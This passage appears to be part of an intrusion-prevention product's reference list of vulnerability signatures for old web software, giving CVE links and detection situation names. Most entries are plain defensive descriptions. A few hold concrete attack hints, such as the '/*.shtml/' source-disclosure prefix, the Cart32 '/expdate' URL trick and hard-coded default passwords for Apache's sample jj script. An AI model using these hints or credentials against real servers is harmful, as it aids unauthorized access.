About this vulnerability: Cross-site scripting vulnerability in BEA WebLogic
Risk: Low
First detected in: sgpkg-ips-5-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: BEA WebLogic
Type: Malfunction
Description: An example script coming with BEA WebLogic 8.1, InteractiveQuery.jsp, suffers from a cross-site scripting vulnerability. Arbitrary script code can be entered in a person parameter.
References:
CVE-2003-0624
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0624
BID-8938
http://www.securityfocus.com/bid/8938
Back to top

HTTP-Bea-WebLogic-Admin-Console-Cross-Site-Scripting

About this vulnerability: Cross site scripting vulnerability in Bea WebLogic
Risk: Moderate
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: BEA WebLogic
Type: Code Injection
Description: Bea WebLogic Server and WebLogic Express have a cross site scripting vulnerability. The vulnerability can be exploited to execute arbitrary script code in the browser of the target user in the context of the trusted site, which may lead to a WeLogic server administrator account compromise.
Situation: HTTP_CSU-Bea-WebLogic-Admin-Console-Cross-Site-Scripting
References:
CVE-2005-1747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1747
BID-13793
http://www.securityfocus.com/bid/13793
OSVDB-16838
http://www.osvdb.org/16838
Back to top

HTTP-Bea-WebLogic-ConsoleHelp-Source-Code-Disclosure

About this vulnerability: Bea Weblogic server allows a malicious user to retrieve the source code of documents residing in the web root directory
Risk: Low
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: BEA WebLogic
Type: Insecure Configuration
Description: An error in the default configuration allows a malicious user to retrieve the source code of documents residing in the web root directory.
References:
CVE-2000-0682
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0682
BID-1518
http://www.securityfocus.com/bid/1518
OSVDB-1481
http://www.osvdb.org/1481
Back to top

HTTP-Bea-WebLogic-Star-Dot-Shtml-Code-Disclosure

About this vulnerability: Bea WebLogic code disclosure
Risk: Moderate
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: BEA WebLogic
Type: Metacharacter Injection
Description: Certain versions of BEA Systems WebLogic servers contain a vulnerability that allows an attacker to disclose the source code of .jsp/.jhtml files residing in the web document's root directory by prefixing the request with "/*.shtml/".
References:
CVE-2000-0683
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0683
BID-1517
http://www.securityfocus.com/bid/1517
OSVDB-1480
http://www.osvdb.org/1480
Back to top

HTTP-Berbew-Webber-Padodor-Trojan-Log-Upload

About this vulnerability: Upload of keystrokes log of Berbew/Webber/Padodor trojan
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Berbew/Webber/Padodor Trojan
Type: Malfunction
Description: Berbew/Webber/Padodor trojan is a program that steals financial and other account details from the user by monitoring keystrokes. The program tries to send this information to a remote adversary by using HTTP.
Situation: HTTP_CS-Berbew-Webber-Padodor-Trojan-Log-Upload
Back to top

HTTP-Big-Brother-Hostsvc-Directory-Traversal

About this vulnerability: Big Brother Hostsvc Directory Traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Big Brother
Type: Directory Traversal
Description: The Big Brother bb-hostsvc.sh contains a directory traversal vulnerability which can be exploited to reveal any file on the system.
References:
CVE-2000-0638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0638
BID-1455
http://www.securityfocus.com/bid/1455
Back to top

HTTP-Bigconf-File-Disclosure

About this vulnerability: File disclosure via 'bigconf.cgi' script
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: F5 Networks BIG-IP
Type: Malfunction
Description: The bigconf.cgi script in F5 BigIP software has a vulnerability that lets a remote attacker to read arbitrary files.
Situation: HTTP_CSU-Cgi-Bigconf-Access
References:
CVE-1999-1550
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1550
BID-778
http://www.securityfocus.com/bid/778
Back to top

HTTP-Bizdb1-Search-Cmd-Exec

About this vulnerability: Command execution using CGI script bizdb1-search.cgi
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CNC Technology BizDB
Type: Malfunction
Description: The bizdb1-search.cgi script in BizDB Web database integration software passes the content of a dbname variable to an unchecked open() call. This vulnerability gives a remote attacker an opportunity to execute commands with the Web server privileges.
Situation: HTTP_CRL-Cgi-Bizdb1-Search-Dbname-Usage
References:
CVE-2000-0287
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0287
BID-1104
http://www.securityfocus.com/bid/1104
Back to top

HTTP-Blog-Torrent-Directory-Traversal

About this vulnerability: Blog Torrent file disclosure vulnerability
Risk: Moderate
First detected in: sgpkg-ips-17-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Blog Torrent
Type: Directory Traversal
Description: Blog Torrent version 0.8 suffers from a directory-traversal vulnerability, which allows remote attackers to download arbitrary files by sending suitable parameters to the btdownload.php file.
Situation: HTTP_CS-Blog-Torrent-Directory-Traversal
References:
CVE-2004-1212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1212
BID-11795
http://www.securityfocus.com/bid/11795
Back to top

HTTP-Bnbform-Hidden-Field-Manipulation

About this vulnerability: Bnbform Hidden Field Manipulation
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: BNBForm
Type: Directory Traversal
Description: The bnbform.cgi allows the reading of arbitary files on the system using the automessage field.
Situation: HTTP_CRL-Bnbform-Hidden-Field-Manipulation
References:
CVE-1999-0937
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0937
Back to top

HTTP-Browser-Usage

About this vulnerability: Browser usage detection.
Risk: Low
First detected in: sgpkg-ips-28-1210
Last changed: sgpkg-ips-1794-5242
Platform: Generic
Software: Generic HTTP client; Sun Java Runtime Environment
Type: Browser
Description: Fingerprints for detecting various browsers' user-agent strings reference this vulnerability. The usage of older browser can be a security risk because of unpatched bugs, and corporate policy may forbid the use of some browsers.
Situation: HTTP_CSH-Firefox-Browser-Usage
HTTP_CSH-Internet-Explorer-Browser-Usage
HTTP_CSH-Internet-Explorer-6.x-Browser-Usage
HTTP_CSH-Internet-Explorer-5.x-Browser-Usage
HTTP_CSH-Internet-Explorer-4.x-Browser-Usage
HTTP_CSH-Internet-Explorer-3.x-Browser-Usage
HTTP_CSH-Netscape-Browser-Usage
HTTP_CSH-Opera-Browser-Usage
HTTP_CSH-Opera-Mini-Browser-Usage
HTTP_CSH-Curl-Tool-Usage
HTTP_CSH-Windows-WebDAV-Access
HTTP_CSH-Libwww-Perl-User-Agent
HTTP_CSH-Browser-User-Agent-Windows-2000
HTTP_CSH-Browser-User-Agent-Windows-XP
HTTP_CSH-Browser-User-Agent-Windows-XP-SP2
HTTP_CSH-Browser-User-Agent-Windows-98
HTTP_CSH-Internet-Explorer-2.x-Browser-Usage
HTTP_CSH-Browser-User-Agent-Windows-Vista
HTTP_CSH-Browser-User-Agent-Mac-OS-X-Leopard
HTTP_CSH-Microsoft-Windows-RSS-Platform-Usage
HTTP_CSH-Internet-Explorer-7.x-Browser-Usage
HTTP_CSH-Debian-Advanced-Packaging-Tool
HTTP_CSH-Microsoft-Bing-Web-Spider
HTTP_CSH-Internet-Explorer-9.x-Browser-Usage
HTTP_CSH-Java-6-Version-1.6.0_08-Usage
HTTP_CSH-Java-6-Version-1.6.0_07-Usage
HTTP_CSH-Java-6-Version-1.6.0_06-Usage
HTTP_CSH-Java-6-Version-1.6.0_05-Usage
HTTP_CSH-Java-6-Version-1.6.0_04-Usage
HTTP_CSH-Java-6-Version-1.6.0_03-Usage
HTTP_CSH-Java-6-Version-1.6.0_02-Usage
HTTP_CSH-Java-6-Version-1.6.0_01-Usage
HTTP_CSH-Java-6-Version-1.6.0-Usage
HTTP_CSH-Java-6-Usage
HTTP_CSH-Java-6-Version-1.6.0_24-Usage
HTTP_CSH-Java-6-Version-1.6.0_23-Usage
HTTP_CSH-Java-6-Version-1.6.0_22-Usage
HTTP_CSH-Java-6-Version-1.6.0_21-Usage
HTTP_CSH-Java-6-Version-1.6.0_20-Usage
HTTP_CSH-Java-6-Version-1.6.0_19-Usage
HTTP_CSH-Java-6-Version-1.6.0_18-Usage
HTTP_CSH-Java-6-Version-1.6.0_17-Usage
HTTP_CSH-Java-6-Version-1.6.0_16-Usage
HTTP_CSH-Java-6-Version-1.6.0_15-Usage
HTTP_CSH-Java-6-Version-1.6.0_14-Usage
HTTP_CSH-Java-6-Version-1.6.0_13-Usage
HTTP_CSH-Java-6-Version-1.6.0_12-Usage
HTTP_CSH-Java-6-Version-1.6.0_11-Usage
HTTP_CSH-Java-6-Version-1.6.0_10-Usage
HTTP_CSH-Java-6-Version-1.6.0_09-Usage
HTTP_CSH-Unknown-Browser
HTTP_CSH-Safari-Browser-Usage
HTTP_CSH-Chrome-Browser-Usage
HTTP_CSH-Iceweasel-Browser-Usage
HTTP_CSH-Wget-Tool-Usage
HTTP_CSH-Browser-User-Agent-Linux
HTTP_CSH-Browser-User-Agent-Windows-2003
HTTP_CSH-Java-7-Version-1.7.0_07-Usage
HTTP_CSH-Java-7-Version-1.7.0_06-Usage
HTTP_CSH-Java-7-Version-1.7.0_05-Usage
HTTP_CSH-Java-7-Version-1.7.0_04-Usage
HTTP_CSH-Java-7-Version-1.7.0_03-Usage
HTTP_CSH-Java-7-Version-1.7.0_02-Usage
HTTP_CSH-Java-7-Version-1.7.0_01-Usage
HTTP_CSH-Java-7-Usage
HTTP_CSH-Java-7-Version-1.7.0_10-Usage
HTTP_CSH-Java-7-Version-1.7.0_09-Usage
HTTP_CSH-Java-7-Version-1.7.0_11-Usage
HTTP_CSH-Nutch-Open-Source-Robot
HTTP_CSH-Googlebot-Web-Spider
HTTP_CSH-Yahoo-Slurp-Web-Spider
HTTP_CSH-MSNBot-Media-Web-Spider
HTTP_CSH-Googlebot-Image-Web-Spider
HTTP_CSH-MSNBot-Web-Spider
HTTP_CSH-Googlebot-Mediapartners-Web-Spider
HTTP_CSH-Radian6-RSS-Feed-Crawler
HTTP_CSH-Python-Urllib-Robot
HTTP_CSH-Ubuntu-Advanced-Packaging-Tool
HTTP_CSH-Pear-HTTP_request-Php-Extension-Package
HTTP_CSH-PycURL-Crawler
HTTP_CSH-Avast-Internet-Security-Syncer-User-Agent
HTTP_CSH-BitDefender-Nimbus-Client-User-Agent
HTTP_CSH-Internet-Explorer-8.x-Browser-Usage
HTTP_CSH-Internet-Explorer-Browser-Plugin-Usage
HTTP_CSH-ExB-Language-Crawler
HTTP_CSH-Microsoft-WNS-Message-User-Agent
HTTP_CSH-F-Secure-ORSP-Client-User-Agent
HTTP_CSH-Sony-PlayStation-3-Browser-Detected
HTTP_CSH-Logitech-Desktop-Messenger-Backweb-Update
HTTP_CSH-Searchme-Charlotte-Web-Spider
HTTP_CSH-Baiduspider-Web-Spider
HTTP_CSH-DotBot-Web-Spider
HTTP_CSH-Yandex-Web-Spider
HTTP_CSH-Microsoft-Windows-Update-Agent-Usage
HTTP_CSH-Internet-Explorer-10.x-Browser-Usage
HTTP_CSH-BigBrother-User-Agent
HTTP_CSH-Browser-User-Agent-Windows-8
HTTP_CSH-Browser-User-Agent-Windows-8.1
HTTP_CSH-Netcraft-Crawler
HTTP_CSH-Internet-Explorer-11.x-Browser-Usage
HTTP_CSH-Java-8-Usage
HTTP_CSH-Joomla-JCE-Vulnerability-Crawler
HTTP_CSH-Mozilla-Minefield-Browser-Usage
HTTP_CSH-Sapphire-Web-Spider
HTTP_CSH-Konqueror-Browser-Usage
HTTP_CSH-Mozilla-SeaMonkey-Browser-Usage
HTTP_CSH-Browser-User-Agent-Mac-OS-X
HTTP_CSH-Jyxobot-Web-Spider
HTTP_CSH-Ask-Jeeves-Teoma-Web-Spider
HTTP_CSH-TurnitinBot-Web-Spider
HTTP_CSH-HTTrack-Tool-Usage
HTTP_CSH-Twiceler-Web-Spider
HTTP_CSH-Googlebot-Mobile-Web-Spider
HTTP_CSH-Google-Desktop-Usage
HTTP_CSH-Browser-User-Agent-Linux-CentOS
HTTP_CSH-AppleWebKit-Usage
HTTP_CSH-Browser-User-Agent-Mac-OS-X-Snow-Leopard
HTTP_CSH-McAfee-Web-Gateway-Usage
HTTP_CSH-Browser-User-Agent-Windows-Phone-8.1
HTTP_CSH-Browser-User-Agent-Windows-Phone-8
HTTP_CSH-Browser-User-Agent-Windows-Phone-7.8
HTTP_CSH-Browser-User-Agent-Windows-Phone-7.5
HTTP_CSH-Browser-User-Agent-Windows-Phone-7
HTTP_CSH-Browser-User-Agent-Windows-Phone
HTTP_CSH-Browser-User-Agent-Android
HTTP_CSH-GlobalSpec-Ocelli-Web-Spider
HTTP_CSH-ScoutJet-Web-Spider
HTTP_CSH-Stonesoft-SMC-Usage
HTTP_CSH-Generic-Java-Application
HTTP_CSH-Browser-User-Agent-iPad
HTTP_CSH-Browser-User-Agent-iPhone
HTTP_CSH-Browser-User-Agent-Android-5.1-Tablet
HTTP_CSH-Browser-User-Agent-Android-5.0-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.4-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.3-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.2-Tablet
HTTP_CSH-Browser-User-Agent-Android-4.1-Tablet
HTTP_CSH-Yahoo-MMCrawler-Web-Spider
HTTP_CSH-Browser-User-Agent-Android-4.0-Tablet
HTTP_CSH-Browser-User-Agent-Android-3-Tablet
HTTP_CSH-Browser-User-Agent-Unidentified-Android-Version-Tablet
HTTP_CSH-Browser-User-Agent-Unidentified-Android-Version-Mobile
HTTP_CSH-Browser-User-Agent-Android-2-Tablet
HTTP_CSH-Browser-User-Agent-Android-1-Tablet
HTTP_CSH-Browser-User-Agent-Android-5.1-Mobile
HTTP_CSH-NTT-Resonant-Ichiro-Mobile-Web-Spider
HTTP_CSH-Lynx-Browser-Usage
HTTP_CSH-NewsGator-NetNewsWire-Usage
HTTP_CSH-Exalead-Exabot-Web-Spider
HTTP_CSH-Swish-e-Web-Spider
HTTP_CSH-Browser-User-Agent-Android-5.0-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.4-Mobile
HTTP_CSH-Picsearch-psbot-Web-Spider
HTTP_CSH-Entireweb-Speedy-Web-Spider
HTTP_CSH-Browser-User-Agent-Android-4.3-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.2-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.1-Mobile
HTTP_CSH-Browser-User-Agent-Android-4.0-Mobile
HTTP_CSH-Browser-User-Agent-Android-3-Mobile
HTTP_CSH-Browser-User-Agent-Android-2-Mobile
HTTP_CSH-Browser-User-Agent-Android-1-Mobile
HTTP_CSH-Internet-Explorer-8.x-Browser-Compatibility-Mode-Usage
HTTP_CSH-Internet-Explorer-10.x-Browser-Compatibility-Mode-Usage
HTTP_CSH-Internet-Explorer-11.x-Browser-Compatibility-Mode-Usage
HTTP_CSH-Internet-Explorer-9.x-Browser-Compatibility-Mode-Usage
HTTP_CSH-Browser-User-Agent-Windows-7
HTTP_CSH-Edge-Browser-Usage
HTTP_CSH-Samsung-Browser-Usage
HTTP_CSH-Up-To-Date-Firefox-Browser-Usage
HTTP_CSH-Obsolete-Firefox-Browser-Usage
HTTP_CSH-Unidentified-Firefox-Browser-Usage
HTTP_CSH-Up-To-Date-Chrome-Browser-Usage
HTTP_CSH-Obsolete-Chrome-Browser-Usage
HTTP_CSH-Unidentified-Chrome-Browser-Usage
HTTP_CSH-Up-To-Date-Edge-Browser-Usage
HTTP_CSH-Obsolete-Edge-Browser-Usage
HTTP_CSH-Unidentified-Edge-Browser-Usage
HTTP_CSH-Obsolete-Safari-Browser-Usage
HTTP_CSH-Unidentified-Safari-Browser-Usage
HTTP_CSH-Up-To-Date-Safari-Browser-Usage
HTTP_CSH-Tizen-Browser-Usage
HTTP_CSH-Electron-Based-Application-Usage
HTTP_CSH-Spotify-Usage
HTTP_CSH-User-Agent-Microsoft-Symbol-Server
HTTP_CSH-User-Agent-VCSoapClient
HTTP_CSH-User-Agent-Windows
HTTP_CSH-User-Agent-Processed
HTTP_CS-MSNBot-Web-Spider
Back to top

HTTP-Bugzilla-Globals-File-Disclosure

About this vulnerability: Sensitive information disclosure in Bugzilla
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Bugzilla
Type: Malfunction
Description: Bugzilla stores global variables, including database username and password, in globals.pl. When requested the file may be returned by the web server without being executed, disclosing sensitive information.
Situation: HTTP_CSU-Bugzilla-Globals-File-Disclosure
References:
CVE-2001-0330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0330
BID-2671
http://www.securityfocus.com/bid/2671
Back to top

HTTP-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution

About this vulnerability: Computer Associates eTrust Intrusion Detection has a code execution vulnerability
Risk: High
First detected in: sgpkg-ips-117-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates eTrust Intrusion Detection
Type: Malfunction
Description: Computer Associates eTrust Intrusion Detection has a code execution vulnerability in the CallCode ActiveX control component. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution
File-Text_CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution
References:
CVE-2007-3302
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3302
BID-25050
http://www.securityfocus.com/bid/25050
Back to top

HTTP-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF

About this vulnerability: A buffer overflow vulnerability in multiple Computer Associates products
Risk: High
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Unicenter Asset Management; Computer Associates Unicenter Desktop Management Bundle; Computer Associates Unicenter Remote Control; Computer Associates Unicenter Software Delivery
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the ListCtrl ActiveX Control used in multiple Computer Associates products. The vulnerability allows execution of arbitrary code in the context of the current user.
Situation: HTTP_SS-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF
File-Text_CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF
References:
CVE-2008-1472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1472
BID-28268
http://www.securityfocus.com/bid/28268
OSVDB-43214
http://www.osvdb.org/43214
Back to top

HTTP-CA-Multiple-Products-gui_cm_ctrls-ActiveX-Control-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in multiple Computer Associates products
Risk: Moderate
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop and Server Management; Computer Associates Desktop Management Suite; Computer Associates Unicenter Asset Management; Computer Associates Unicenter Desktop Management Bundle; Computer Associates Unicenter Software Delivery; Computer Associates Unicenter Remote Control
Type: Buffer Overflow
Description: There is a memory corruption vulnerability in multiple Computer Associates products. Successful exploitation allows non-privileged arbitrary code execution on a vulnerable host.
Situation: HTTP_SS-CA-Multiple-Products-gui-cm-ctrls-ActiveX-Control-Memory-Corruption
File-Text_CA-Multiple-Products-gui-cm-ctrls-ActiveX-Control-Memory-Corruption
References:
CVE-2008-1786
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1786
BID-28809
http://www.securityfocus.com/bid/28809
OSVDB-44423
http://www.osvdb.org/44423
Back to top

HTTP-Cal-Make-Pl-File-Disclosure

About this vulnerability: cal_make.pl file disclosure
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: PerlCal
Type: Input Validation
Description: The cal_make.pl can be tricked into revealing the contents of any file on the system readable with the privileges of the web server using a directory traversal.
References:
CVE-2001-0463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0463
BID-2663
http://www.securityfocus.com/bid/2663
Back to top

HTTP-Campas-Cgi-System-Compromise

About this vulnerability: Arbitrary command-execution vulnerability in Campas sample script
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Campas
Type: Metacharacter Injection
Description: A sample script distributed with the NCSA httpd server, Campas, does not sufficiently validate its input. Remote attackers may execute arbitrary commands in the host by sending to the script a suitable argument separated with line feed characters.
References:
CVE-1999-0146
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0146
BID-1975
http://www.securityfocus.com/bid/1975
Back to top

HTTP-Carbo-Icat-Directory-Traversal

About this vulnerability: Carbo Icat Directory Traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Cat Electronic Commerce Suite
Type: Directory Traversal
Description: The Carbo Icat Suite does not validate input sufficiently and because of this can be exploted to reveal any file on the system using a directory traversal attack.
References:
CVE-1999-1069
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1069
BID-2126
http://www.securityfocus.com/bid/2126
Back to top

HTTP-Carello-Add-Exe-File-Disclosure

About this vulnerability: File disclosure by add.exe in Carello shopping cart
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: CarelloWeb
Type: Malfunction
Description: Add.exe in the Carello web shopping cart software allows remote users to duplicate files on the server. When calling add.exe with the name of an existing file, a duplicate of the file is created with a number appended to the name. For scripts, the new name is not necessarily recognized as a file format and a request will return the scripts source code.
References:
CVE-2000-0396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0396
BID-1245
http://www.securityfocus.com/bid/1245
Back to top

HTTP-Carey-Internet-Services-Commerce-Directory-Traversal

About this vulnerability: Carey Internet Services commerce.cgi Directory Traversal
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1638-5242
Platform: Unix
Software: Carey Internet Services commerce.cgi
Type: Directory Traversal
Description: The commerce.cgi contains a vulnerability which could allow an attacker to view arbitary files on the system by using a directory traversal and the null character.
References:
CVE-2001-0210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0210
BID-2361
http://www.securityfocus.com/bid/2361
Back to top

HTTP-Cart32-ClientList-Disclosure

About this vulnerability: Disclosure of list of clients in Cart32
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: McMurtrey/Whitaker & Associates Cart32
Type: Malfunction
Description: The Cart32 shopping cart system by McMurtrey/Whitaker&Associates contains an embedded password. A remote attacker can use this vulnerability to access a list of shopping cart clients.
References:
CVE-2000-0136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0136
BID-1153
http://www.securityfocus.com/bid/1153
Back to top

HTTP-Cart32-Expdate-Information-Disclosure

About this vulnerability: Disclosure of debugging information in Cart32
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: McMurtrey/Whitaker & Associates Cart32
Type: Malfunction
Description: The Cart32 shopping cart system by McMurtrey/Whitaker&Associates allows a remote attacker to access sensitive debugging information by appending '/expdate' to the URL request.
References:
CVE-2000-0430
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0430
BID-1358
http://www.securityfocus.com/bid/1358
Back to top

HTTP-Cart32-Remote-Admin-Password

About this vulnerability: Cart32 Remote Admin Password
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: Cart32
Type: Backdoor
Description: Cart32 allows the changing of the administrative password without knowledge of the previous password.
References:
CVE-2000-0429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0429
BID-1153
http://www.securityfocus.com/bid/1153
Back to top

HTTP-Catalyst-Remote-Command-Execution

About this vulnerability: Catalyst Remote Command Execution
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1636-5242
Platform: Cisco CatOS
Software: <os>
Type: Malfunction
Description: Cisco Catalyst 3500 XL contains a vulnerability which when exploited will allow the attacker to execute commands and view files on the system.
References:
CVE-2000-0945
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0945
BID-1846
http://www.securityfocus.com/bid/1846
OSVDB-444
http://www.osvdb.org/444
Back to top

HTTP-Cgi-Blackboard-User-Update

About this vulnerability: Access validation vulnerability in Blackboard CourseInfo
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Blackboard CourseInfo
Type: Malfunction
Description: Blackboard CourseInfo has an access validation vulnerability in the user_update_admin.pl and user_update_passwd.pl scripts. If a user has an existing account on Blackboard CourseInfo, the user is able to modify the information on the database and gain privileges by running these scripts.
References:
CVE-2000-0627
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0627
BID-1486
http://www.securityfocus.com/bid/1486
Back to top

HTTP-Cgi-Cal_make.pl-Directory-Traversal

About this vulnerability: Directory traversal file disclosure in Cal_make.pl
Risk: Moderate
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: PerlCal
Type: Directory Traversal
Description: PerlCal is a web-based calendar software. In some versions there exists a directory traversal vulnerability that allows a remote attacker to read arbitrary files.
References:
CVE-2001-0463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0463
BID-2663
http://www.securityfocus.com/bid/2663
Back to top

HTTP-Cgi-CGIForum-Dir-Traversal

About this vulnerability: Directory traversal vulnerability in CGIForum 1.0
Risk: Low
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Markus Triska CGIForum
Type: Malfunction
Description: The cgiforum.pl script in CGIForum 1.0 does not properly validate the input given in the 'thesection' parameter. A remote attacker can use directory traversal as an argument to this parameter to read arbitrary files on the target system.
References:
CVE-2000-1171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1171
BID-1963
http://www.securityfocus.com/bid/1963
Back to top

HTTP-Cgi-DCForum-Command-Execution

About this vulnerability: Command execution vulnerability in DCForum
Risk: Moderate
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: DC Scripts DCForum
Type: Malfunction
Description: DC Scripts DCForum has a vulnerability in the handling of user-supplied input. This vulnerability allows a remote attacker to execute arbitrary commands by uploading a Perl program to the server and using directory traversal to reference it.
References:
CVE-2001-0436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0436
BID-2611
http://www.securityfocus.com/bid/2611
OSVDB-3862
http://www.osvdb.org/3862
Back to top

HTTP-Cgi-Document.D2W-Information-Disclosure

About this vulnerability: Document.d2w Information Disclosure
Risk: Low
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: IBM Net.Data
Type: Malfunction
Description: A specially-crafted URL causes the scripting engine to print the path of its configuration files. This information may used to launch new, more severe attacks.
References:
CVE-2000-1110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1110
BID-2017
http://www.securityfocus.com/bid/2017
Back to top

HTTP-Cgi-FormMail-Command-Execution

About this vulnerability: Command execution vulnerability in FormMail
Risk: Moderate
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Unix
Software: Matt Wright FormMail
Type: Malfunction
Description: FormMail has a vulnerability in the verification of 'recipient' hidden field of the form-based input. A remote attacker is able to use this vulnerability to execute arbitrary commands on the web server.
Situation: HTTP_CRL-FormMail-Command-Execution
References:
CVE-1999-0172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0172
BID-2079
http://www.securityfocus.com/bid/2079
Back to top

HTTP-Cgi-HTDig_File_Disclosure

About this vulnerability: File disclosure vulnerability in htdig
Risk: Low
First detected in: sgpkg-ips-2-1102
Last changed: sgpkg-ips-1637-5242
Platform: Unix
Software: htdig
Type: Malfunction
Description: The 'htsearch' script in ht://Dig has a vulnerability that allows a remote attacker to gain read access on arbitrary files by specifying the wanted file in a script parameter.
References:
CVE-2000-0208
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0208
BID-1026
http://www.securityfocus.com/bid/1026
Back to top

HTTP-Cgi-Jj-Sys-Compromise

About this vulnerability: System compromise via CGI script /cgi-bin/jj
Risk: Moderate
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Apache
Type: Insecure Configuration
Description: A sample CGI program /cgi-bin/jj in Apache Web Server passes user data to the /bin/mail program. This feature can be used to escape into a shell using the '~' character on systems where /bin/mail allows this. A password is requested from the attacker but the program has a hard coded default password HTTPdRocKs or SDGROCKS.
Situation: HTTP_CSU-Sample-Cgi-Jj-Access
References:
CVE-1999-0260
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0260
BID-2002
http://www.securityfocus.com/bid/2002
Back to top

HTTP-Cgi-Metertek-Pagelog.cgi-Directory-Traversal-Vulnerability

About this vulnerability: File disclosure in Metertek pagelog.cgi
Risk: Moderate
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
